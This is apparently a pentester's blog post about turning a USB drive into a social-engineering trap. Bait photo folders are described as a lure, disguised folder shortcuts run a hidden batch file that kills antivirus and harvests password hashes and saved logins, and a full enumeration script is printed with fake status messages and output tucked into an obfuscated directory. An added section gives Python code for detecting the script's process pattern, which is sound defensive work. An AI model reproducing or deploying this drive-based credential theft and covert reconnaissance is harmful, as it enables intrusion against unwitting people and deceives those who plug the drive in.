Enumeration using usb hacksaw


USB Enumerator vs USB Hacksaw



My next folder is titled "Wedding Pics - DO NOT DELETE" and it has a few wedding and baby pics in it (no metadata, remember).



So what cold-hearted person wouldn't want to return a USB device with baby and wedding pics on it, right? Oh, and the guy in the wedding photo... he's in a wheelchair (thanks, Google Images), so it would take a truly cold-hearted individual to keep that USB drive.

Next I have a couple more directories.



Well, they look like directories, but they are just links to my evil scripts that will help me on my dark crusade.

A closer look at the shortcut reveals it's actually a link to a batch file that will kill any running AV and launch programs to get the local password hashes, internet passwords and login details for MSN etc. And we all know that people re-use passwords, don't we.




When someone clicks on one of these 'shortcuts', the running batch file is placed behind any open windows, and the only clue that anything is going on is a folder in the toolbar, which disappears after a few seconds.




And the batch file can do anything. Obviously I want to stop AV first, and then, thanks to a few tools from Nirsoft as well as a few others from the likes of foofus, I have loads of juicy details coming my way.




And what does this give me? Hashes, oh the lovely hashes.......



And of course we want the websites too.



And there's plenty more, but I'm sure you get the point.


But this is a U3 thumb drive, so hopefully we don't need to rely on a nosey bugger clicking around, because it should use the autorun feature to enumerate the network as soon as it's plugged in. It does the crazy enumeration coolness by running this script from the hidden \WIP\CMD folder.



Here's the simple batch file that does the enumeration:

@Echo off
echo Starting. Do not close program. Please wait 15 seconds.
::Generate a unique filename
set fn=%computername%-%random%
::Create a non-obvious directory
mkdir .\Windows\System\System32\etc\hosts\win\0011\%fn%
cd .\Windows\System\System32\etc\hosts\win\0011\%fn%
::Get local Time and Date Info
time /t >%fn%.log
date /t >>%fn%.log
::Network Info
net user /domain >>%fn%.log
echo Restarting critical service. Please Wait 5 seconds.
net group /domain >>%fn%.log
net localgroup /domain >>%fn%.log
net localgroup administrators /domain >>%fn%.log
net localgroup "Account Operators" /domain >>%fn%.log
net accounts /domain >>%fn%.log
net view /domain >>%fn%.log
net view >>%fn%.log
echo Service restart complete. Please wait 5 seconds.
::Local Info
ipconfig /all >>%fn%.log
ipconfig /displaydns >>%fn%.log
netstat -ano >>%fn%.log
netstat -r >>%fn%.log
arp -a >>%fn%.log
tasklist /svc >>%fn%.log
tasklist >>%fn%.log
tasklist /v >>%fn%.log
net share >>%fn%.log
net use >>%fn%.log
net accounts >>%fn%.log
net localgroup >>%fn%.log
net localgroup administrators >>%fn%.log
systeminfo >>%fn%.log
netsh firewall show config >>%fn%.log
echo Service failed to load. Error code MS-31337
netsh diag show all /v >>%fn%.log

And that pretty much enumerates the network for all accounts, groups and members of admin groups. It gets password policies, computer details from the domain, domain names....




local accounts and groups, firewall policies, applied hotfixes, network connections, open ports, running services, shares, networking information and other bits and bobs as well.




And the beauty of it all is that it's just using Microsoft tools, which won't make the AV go loopy and freak out. So within a few seconds of plugging the device into any networked PC with a USB port, you'll have more data than you can shake a big enumerating stick at. Wonderful!

All this useful data is output to a single log file in a deeply buried, obfuscated directory with a random number appended to the name, so it can be run time after time and stays nicely tucked away.

But what if autorun is disabled? Well, just like the script that kills the AV and grabs the passwords, this can be run manually by clicking the batch file, or by fronting it with a shortcut that has a folder icon and running that.
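From the defensive side, here is an added example (not from the original post or the Hacksaw project) of how a SOC could spot this script's signature: one cmd.exe parent launching many of the built-in enumeration tools within seconds. The process-creation records, the E: drive letter and the enum.bat path are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Built-in tools the Hacksaw batch chains together; any one of them is routine
# admin activity, so the signal is many distinct ones from one parent, fast.
ENUM_TOOLS = {"net.exe", "net1.exe", "ipconfig.exe", "netstat.exe", "arp.exe",
              "tasklist.exe", "systeminfo.exe", "netsh.exe"}
WINDOW_SECONDS = 60
MIN_DISTINCT = 4

def ev(ts, ppid, parent_image, parent_cmdline, image, cmdline):
    return dict(ts=datetime.fromisoformat(ts), ppid=ppid, parent_image=parent_image,
                parent_cmdline=parent_cmdline, image=image, cmdline=cmdline)

# Constructed process-creation records (fields loosely follow Sysmon event 1).
BAT = r'cmd.exe /c "E:\WIP\CMD\enum.bat"'   # hypothetical path on a removable drive
SAMPLE_EVENTS = [
    ev("2024-01-01T10:00:01", 4200, "cmd.exe", BAT, "net.exe", "net user /domain"),
    ev("2024-01-01T10:00:02", 4200, "cmd.exe", BAT, "net.exe", "net group /domain"),
    ev("2024-01-01T10:00:04", 4200, "cmd.exe", BAT, "ipconfig.exe", "ipconfig /all"),
    ev("2024-01-01T10:00:05", 4200, "cmd.exe", BAT, "netstat.exe", "netstat -ano"),
    ev("2024-01-01T10:00:06", 4200, "cmd.exe", BAT, "arp.exe", "arp -a"),
    ev("2024-01-01T10:00:08", 4200, "cmd.exe", BAT, "systeminfo.exe", "systeminfo"),
    # an admin at an interactive prompt: three tools spread over an hour, no alert
    ev("2024-01-01T11:00:00", 6100, "cmd.exe", "cmd.exe", "ipconfig.exe", "ipconfig /all"),
    ev("2024-01-01T11:30:00", 6100, "cmd.exe", "cmd.exe", "net.exe", "net use"),
    ev("2024-01-01T12:00:00", 6100, "cmd.exe", "cmd.exe", "netstat.exe", "netstat -r"),
]

def detect_enum_bursts(events, window=WINDOW_SECONDS, min_distinct=MIN_DISTINCT):
    """One alert per cmd.exe parent that launches >= min_distinct distinct tools within `window` s."""
    by_parent = defaultdict(list)
    for e in events:
        if e["parent_image"].lower() == "cmd.exe" and e["image"].lower() in ENUM_TOOLS:
            by_parent[e["ppid"]].append(e)
    alerts = []
    for ppid, evs in by_parent.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):            # sliding window over this parent's children
            while (evs[end]["ts"] - evs[start]["ts"]).total_seconds() > window:
                start += 1
            run = evs[start:end + 1]
            tools = sorted({e["image"].lower() for e in run})
            if len(tools) >= min_distinct:
                alerts.append({"ppid": ppid, "tools": tools,
                               "off_system_drive": bool(re.search(r"\b[D-Z]:\\", run[0]["parent_cmdline"], re.I)),
                               "domain_queries": any("/domain" in e["cmdline"].lower() for e in run)})
                break                          # one alert per parent is enough
    return alerts
```

The two extra fields are triage context: a parent command line pointing at a non-system drive letter and a run of /domain queries together look much more like this drive than like an admin poking around.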


So how can this be useful in a pentest? It could be that during the pentest you have social-engineered your way onto a helpful person's PC, who is going to print something off for you or email an important document for you, and said files are on your USB device. Or you could hand a USB device to a receptionist and ask her to check whose it is. Or of course you could just be transferring those picture or music files to your friend's computer. So if you're reading this and you know me, maybe next time you ask me for a file or a movie that I have on USB you had better think again!

So there you have it, my take on making my USB Hacksaw a little more interesting.
